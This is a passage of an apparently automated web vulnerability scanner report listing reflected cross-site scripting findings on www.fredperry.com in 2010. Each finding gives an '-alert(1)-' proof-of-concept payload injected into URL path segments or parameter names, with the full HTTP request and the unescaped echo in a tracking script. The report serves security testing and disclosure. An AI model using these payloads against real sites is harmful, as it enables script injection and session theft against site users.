Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d54c5"-alert(1)-"13b1baf7e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0tposdlgclqd1h58brr6uk20h6; expires=Tue, 09-Nov-2010 17:20:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editiond54c5"-alert(1)-"13b1baf7e25/women/accessories/");
//]]>
...[SNIP]...

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58f2e"-alert(1)-"049337dcf29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=73thgc0j921t9c0heu3odub2g1; expires=Tue, 09-Nov-2010 17:20:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women58f2e"-alert(1)-"049337dcf29/accessories/");
//]]>
...[SNIP]...

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6a85"-alert(1)-"300d6ce8743 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:21:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s5epv4r4i2sttp44o9n4suh513; expires=Tue, 09-Nov-2010 17:21:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessoriese6a85"-alert(1)-"300d6ce8743/");
//]]>
...[SNIP]...

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31709"-alert(1)-"d269657da44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hr77dp20kva6vnl2ndq6nniuq1; expires=Tue, 09-Nov-2010 17:18:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/accessories/?31709"-alert(1)-"d269657da44=1");
//]]>
...[SNIP]...

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a422"-alert(1)-"8f681c0c66b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ta15vgogrnorgonqfudmjnrj76; expires=Tue, 09-Nov-2010 17:14:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1a422"-alert(1)-"8f681c0c66b/women/bags/");
//]]>
...[SNIP]...

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b43"-alert(1)-"406580c4491 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womena6b43"-alert(1)-"406580c4491/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sdbh97r4md7k7ln26gr9jls147; expires=Tue, 09-Nov-2010 17:15:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womena6b43"-alert(1)-"406580c4491/bags/");
//]]>
...[SNIP]...

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba45"-alert(1)-"8611336e635 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bagsdba45"-alert(1)-"8611336e635/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=79culemoq5vvafjn57qrqbp0k5; expires=Tue, 09-Nov-2010 17:15:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bagsdba45"-alert(1)-"8611336e635/");
//]]>
...[SNIP]...

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a888"-alert(1)-"e9449111db7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb2m8bt9ennbk1klnk1ot8qpf5; expires=Tue, 09-Nov-2010 17:14:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/bags/?1a888"-alert(1)-"e9449111db7=1");
//]]>
...[SNIP]...

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc77"-alert(1)-"8df6d5753ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9c63vhna60h3f9d7p0flptleo4; expires=Tue, 09-Nov-2010 17:15:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition9cc77"-alert(1)-"8df6d5753ab/women/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb8ab"-alert(1)-"d3b4f2c0bac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qjpnguf6q36k2ksu35vp7htro0; expires=Tue, 09-Nov-2010 17:15:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenfb8ab"-alert(1)-"d3b4f2c0bac/blank-canvas-ann-sofie-back/");
//]]>
...[SNIP]...

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36cd8"-alert(1)-"8e2713d7551 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:16:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5qbk7rak06nsao4tonccqlbgd3; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back36cd8"-alert(1)-"8e2713d7551/");
//]]>
...[SNIP]...

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/blank-canvas-ann-sofie-back/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d28b"-alert(1)-"4759f050573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ksf7oqbfqpoiif7p6bjfjpq1i3; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Ann-Sof
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/blank-canvas-ann-sofie-back/?4d28b"-alert(1)-"4759f050573=1");
//]]>
...[SNIP]...

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138a5"-alert(1)-"4cb6177581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qva44de22rhlahod84sf5ghjp5; expires=Tue, 09-Nov-2010 17:14:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition138a5"-alert(1)-"4cb6177581/women/collaboration/");
//]]>
...[SNIP]...

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/collaboration/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b2d"-alert(1)-"4d7360fd3ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womena4b2d"-alert(1)-"4d7360fd3ec/collaboration/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
